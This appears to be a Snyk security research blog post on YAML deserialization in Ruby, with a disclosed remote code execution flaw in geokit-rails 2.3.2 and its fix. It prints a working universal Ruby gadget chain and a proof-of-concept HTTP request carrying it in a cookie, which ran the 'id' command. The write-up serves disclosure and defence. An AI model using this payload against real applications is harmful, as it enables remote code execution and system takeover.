Finding YAML Deserialization with Snyk Code
Calum Hutton
February 23, 2023
I conducted some research to identify YAML injection issues in open-source projects using Snyk Code. Though the vulnerability itself is not new, the potential impact of YAML injection is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP, and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails.
YAML
YAML is more than a mere data interchange format like JSON. The specification describes a number of advanced features that make it ripe for security investigation, such as:
Custom tags (e.g. in PyYAML)
Anchors and aliases
Merged attributes
Multiple-document streams
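Several of the features listed above are easy to see with Ruby's built-in parser. The following is a minimal sketch; the document contents and key names are made up for illustration.

```ruby
require 'yaml'

# An anchor (&defaults) names a node, an alias (*defaults) refers back to it,
# and the merge key (<<) copies the aliased mapping into another mapping.
config_yaml = <<~YAML
  defaults: &defaults
    adapter: postgres
    host: localhost
  development:
    <<: *defaults
    database: dev_db
YAML

# safe_load rejects aliases unless they are explicitly enabled.
config = YAML.safe_load(config_yaml, aliases: true)
puts config['development'].inspect

# A single stream can carry several documents, each introduced by "---".
documents = YAML.load_stream("--- first\n--- second\n")
puts documents.inspect
```

The merged development mapping ends up with the adapter and host keys from defaults plus its own database key.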
YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).
YAML deserialization in Ruby
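In Ruby, YAML parsing ships with the standard library (the Psych parser, loaded with require 'yaml'), so no additional gems are needed. If an application uses the built-in parser on untrusted input, it is vulnerable to deserialization attacks when YAML.load() or YAML.load_file() is used instead of YAML.safe_load() or YAML.safe_load_file(), respectively. This applies to Psych versions before 4.0 (bundled with Ruby up to 3.0); from Psych 4.0, YAML.load() is safe by default and the permissive behavior lives in YAML.unsafe_load(). An alternative, safe-by-default YAML parser is available in the SafeYAML project.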
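To make the difference concrete, here is a minimal sketch of how YAML.safe_load() treats plain data versus a document that asks for a Ruby object. The Point class is hypothetical and exists only for this example.

```ruby
require 'yaml'

# Hypothetical application class, defined only for this example.
class Point
  attr_accessor :x, :y
end

plain  = "---\nid: 1\ndesc: A simple hash\n"
tagged = "--- !ruby/object:Point\nx: 1\ny: 2\n"

# Plain scalars, arrays, and hashes load normally.
plain_result = YAML.safe_load(plain)

# A document that asks for a Ruby object is rejected.
rejected = begin
  YAML.safe_load(tagged)
  false
rescue Psych::DisallowedClass
  true
end

# Classes that are genuinely needed can be allowlisted one by one.
point = YAML.safe_load(tagged, permitted_classes: [Point])

puts plain_result.inspect
puts "tagged document rejected: #{rejected}"
puts point.x
```

Allowlisting should be kept as narrow as possible, since every permitted class widens what an attacker-supplied document can instantiate.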
The following script and output demonstrate an unsafe way to load YAML with YAML.load().
require 'yaml'

var = {
  id: 1,
  desc: 'A simple hash'
}

yaml = '---
:id: 1
:desc: A simple hash'

puts var
puts YAML.load(yaml)

# Prints:
#
# {:id=>1, :desc=>"A simple hash"}
# {:id=>1, :desc=>"A simple hash"}
The var variable holds a simple Ruby hash, and the yaml variable contains the equivalent hash serialized in YAML form. Both puts statements display the same hash because the yaml variable has been deserialized from a YAML string back into a hash via YAML.load(). More complex objects can also be serialized and deserialized in this way.
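As a sketch of what "more complex objects" looks like in practice, the following round-trips an instance of a custom class. The Location class is made up for this example, and the loader is chosen at runtime because newer Psych versions only revive arbitrary objects through YAML.unsafe_load().

```ruby
require 'yaml'

# Hypothetical class used only to illustrate object serialization.
class Location
  attr_reader :lat, :lng

  def initialize(lat, lng)
    @lat = lat
    @lng = lng
  end
end

# Dumping an object records its class in a !ruby/object tag.
serialized = YAML.dump(Location.new(51.5, -0.12))
puts serialized

# Use unsafe_load where it exists (newer Psych), else fall back to load.
loader = YAML.respond_to?(:unsafe_load) ? :unsafe_load : :load
restored = YAML.public_send(loader, serialized)

puts restored.class
puts restored.lat
```

The tag in the serialized form is what tells the parser which class to instantiate, and it is exactly this mechanism that an attacker-controlled document can abuse.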
During the initial stages of this research, I came across a universal Ruby YAML deserialization gadget, effective on Ruby versions 2.x to 3.x, which triggers arbitrary command execution when deserialized.
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve
The above YAML payload will execute the id command upon deserialization if it is parsed via YAML.load() or YAML.load_file().
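Payloads of this kind work because reviving a tagged object can run code that belongs to the named class. As a harmless illustration (the Probe class is made up, and this is not the gadget chain itself), Psych calls init_with on a revived object when its class defines that method:

```ruby
require 'yaml'

# Hypothetical class; it only records that its hook was invoked.
class Probe
  attr_reader :seen

  # Psych invokes this hook, if defined, while reviving a tagged object.
  def init_with(coder)
    @seen = coder['note']
  end
end

doc = "--- !ruby/object:Probe\nnote: hello\n"

# Use unsafe_load where it exists (newer Psych), else fall back to load.
loader = YAML.respond_to?(:unsafe_load) ? :unsafe_load : :load
probe = YAML.public_send(loader, doc)

puts probe.seen
```

Here the hook only stores a string, but the same entry point runs for any class the document names, which is why loading untrusted YAML with the permissive loader is dangerous.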
Case study: geokit-rails (2.3.2)
The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin calls the unsafe YAML.load() method in retrieve_location_from_cookie_or_service(), defined in geokit-rails/ip_geocode_lookup.rb:
# Uses the stored location value from the cookie if it exists. If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
  return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
  location = Geocoders::MultiGeocoder.geocode(get_ip_address)
  return location.success ? location : nil
end
The data flowing into the unsafe YAML.load() method originates from the Ruby on Rails cookies object, which holds the cookies sent in the request. This is good news for an attacker, as cookies can be directly controlled by crafting the appropriate HTTP request.
Proof of concept
I set up a Rails application running the geokit-rails plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location cookie.
GET http://127.0.0.1:3000/vulns HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0
Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt
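The cookie value in the request above is a YAML document in URL-encoded form, where newlines become %0A, colons become %3A, and spaces become +. A minimal sketch of that encoding, using the harmless hash from earlier in the article and Ruby's standard uri library (an assumption on my part; any form-encoding routine would do), looks like this:

```ruby
require 'uri'

# The harmless YAML document from the earlier example.
yaml = "---\n:id: 1\n:desc: A simple hash"

# Form-encode the document so it can travel in a Cookie header.
encoded = URI.encode_www_form_component(yaml)
puts encoded

# Decoding restores the original document, newlines and indentation included.
decoded = URI.decode_www_form_component(encoded)
puts decoded == yaml
```

Because the encoding preserves whitespace exactly, the indentation that YAML depends on survives the trip through the cookie.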
Within the Rails application, the payload was deserialized and executed, running the id command to prove command execution.
Started GET "/vulns" for 127.0.0.1 at 2022-11-07 12:05:57 +0000
Processing by VulnsController#index as HTML
sh: reading: command not found
uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
Completed 500 Internal Server Error in 167ms (Allocations: 35610)
For a system using geokit-rails, an attacker exploiting this vulnerability could achieve RCE, potentially allowing for total system takeover.
Remediation
This issue was responsibly disclosed to the maintainer of geokit-rails and was fixed in version 2.5.0 by storing the coordinate information as JSON instead of YAML. As a result of this research, Snyk Code's rules for detecting YAML injection were improved, meaning more of these issues should now be detectable in user projects.
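To illustrate why moving to JSON closes the hole, here is a minimal sketch of parsing a location cookie as JSON. It is not the actual geokit-rails patch: the parse_location_cookie helper and the lat and lng key names are assumptions made for this example.

```ruby
require 'json'

# Hypothetical helper, not geokit-rails code: parses a cookie value that is
# assumed to hold a JSON object with numeric "lat" and "lng" keys.
def parse_location_cookie(raw)
  return nil if raw.nil? || raw.empty?

  data = JSON.parse(raw)
  return nil unless data.is_a?(Hash)

  lat = data['lat']
  lng = data['lng']
  return nil unless lat.is_a?(Numeric) && lng.is_a?(Numeric)

  { lat: lat.to_f, lng: lng.to_f }
rescue JSON::ParserError
  # Anything that is not valid JSON, including a YAML document, is discarded.
  nil
end

puts parse_location_cookie('{"lat": 51.5, "lng": -0.12}').inspect
puts parse_location_cookie("---\n- !ruby/object:Gem::Installer\n    i: x\n").inspect
```

JSON.parse only produces hashes, arrays, strings, numbers, booleans, and nil by default, so there is no tag an attacker can use to request an arbitrary class.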